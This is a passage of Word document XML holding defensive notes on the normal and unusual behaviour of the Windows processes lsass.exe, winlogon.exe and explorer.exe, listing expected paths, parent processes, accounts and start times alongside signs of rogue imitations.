        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Normal Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EDC5C1" w14:textId="75F82AF9" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196"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System32\lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C95979B" w14:textId="40ECF80A" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent Process: wininit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF47597" w14:textId="7458F7A9" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Number of Instances: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421FCEB" w14:textId="68B2E7EC" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User Account: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32782F03" w14:textId="0828272A" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start Time: within seconds of boot time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07731F8C" w14:textId="4225B520" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unusual Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA257EE" w14:textId="0B05848D" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent process other than wininit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBACBB1" w14:textId="108B41B3" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Image file path other than C:\Windows\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496416FD" w14:textId="15510799" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Subtle misspellings to hide rogue processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D2AB5" w14:textId="451596A2" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>multiple running instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684095FF" w14:textId="4329DBC3" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Not running as SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E09AB6" w14:textId="227E2BC9" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>WINLOGON.EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D627EC2" w14:textId="4E85166D" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>responsible for handling Secure Attention Sequence (SAS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BA1FCC" w14:textId="4D9C9B35" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ATL+CTRL+DELETE key combo users press to enter username and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFB117B" w14:textId="668C0139" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>responsible for loading user profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2417CCF0" w14:textId="4DF4BBF9" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>loads user’s NTUSER.DAT into HKCU and loads user shell via userinit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DC0FB5" w14:textId="46042A95" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">also locks screen, runs screensaver, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28E27750" w14:textId="0DFB84D3" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Normal Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052345E8" w14:textId="012DE21F" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196"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System32\winlogon.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58486CE4" w14:textId="68DC7F6F" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent Process: Created by smss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E11B364" w14:textId="778F2C79" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Number of Instances: 1+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAA0522" w14:textId="4939B0BF" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User Account: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E737E" w14:textId="5EF35011" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start Time: within seconds of boot for Session</w:t>
      </w:r>
      <w:r w:rsidR="00292F5A" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CC3AEB" w14:textId="4A1B4711" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unusual Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1382391C" w14:textId="441F77B3" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">An actual parent </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>process</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="063FD91C" w14:textId="555C42D9" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Image file path other than C:\Windows\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7D5D17" w14:textId="6F3D965E" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Subtle misspellings to hide rogue processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BE9268" w14:textId="14F45018" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Not running as SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB1567F" w14:textId="4921689B" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Shell value in the registry other than explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B6D1F6" w14:textId="5482F894" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>EXPLORER.EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F871B09" w14:textId="19238C43" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>gives user access to folders and files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C8A4E9" w14:textId="33852F49" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>functionality to Start Menu, Taskbar, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1773C8E8" w14:textId="022F2F81" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> process runs userinit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673E169E" w14:textId="7E454E89" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>launches value in HKLM\Software\Microsoft\Windows NT\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>\Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E2D3DB" w14:textId="31BFFB61" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Normal Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B8A36" w14:textId="0F6A85D0" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Image Path: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>%\explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049C3D14" w14:textId="17F67787" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Parent Process: non-existent (userinit.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>self terms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65542C5D" w14:textId="42097E23" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Number of Instances: 1+ per user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0138D9C3" w14:textId="1CBB6422" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User Account: Logged-in User(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD3DF3" w14:textId="12F7A57A" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start Time: When first interactive user logon session begins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4193F1E4" w14:textId="0B7F07B1" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unusual Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356D6D6" w14:textId="42F9CACA" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Actual parent process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E58A38" w14:textId="70675086" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>image file path other than C:\Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46890E07" w14:textId="55B833C6" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Running as an unknown user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A707AD" w14:textId="3BFB86D0" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>subtle misspellings to hide rogue processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6FB08E" w14:textId="45DD7221" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Outbound TCP/IP connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B704928" w14:textId="1C6570A6" w:rsidR="00292F5A" w:rsidRPr="0084205E" w:rsidRDefault="00292F5A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
